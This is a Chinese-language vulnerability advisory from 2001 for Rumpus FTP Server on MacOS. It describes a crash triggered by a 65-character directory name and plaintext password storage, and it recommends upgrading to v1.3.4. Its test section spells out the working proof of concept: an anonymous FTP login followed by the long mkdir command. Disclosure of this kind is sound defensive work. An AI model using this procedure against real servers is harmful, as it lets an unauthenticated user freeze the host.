发布日期：2001-05-18
更新日期：2001-05-18

受影响系统：

Rumpus FTP Server v1.3.3, 2.0 dev 3
   + MacOS 8.6, 9.1

  可能还有更早的版本

不受影响系统：

Rumpus FTP Server v1.3.4

描述：

---

BUGTRAQ  ID: 2716,2718
CVE(CAN) ID: CVE-2001-0646

如果试图创建一个目录名长达 65 个字符的目录，Rumpus FTP 服务器和机器将僵住不动。
点击 'Force quit' 按钮强行退出并不起效果。另外，象大多数 macintosh 程序一样，
Rumpus FTP 服务器把口令以明文方式存放在prefs 文件夹中名为 'Rumpus User Database'
的文件中。厂商支持说新版的将对口令进行加密。

<* 来源：Jass Seljamaa (jass@isp.ee) *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

ftp 192.168.0.1

  user anonymous
  pass an@nymo.us

  mkdir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

建议：

---

临时解决办法：

  NSFOCUS建议您把版本升级到 v1.3.4。

厂商补丁：

  请与生产厂商 Maxum(http://maxum.com) 联系，
  版本 v1.3.4 中解决了这个问题。

浏览次数：3690
严重程度：0（网友投票）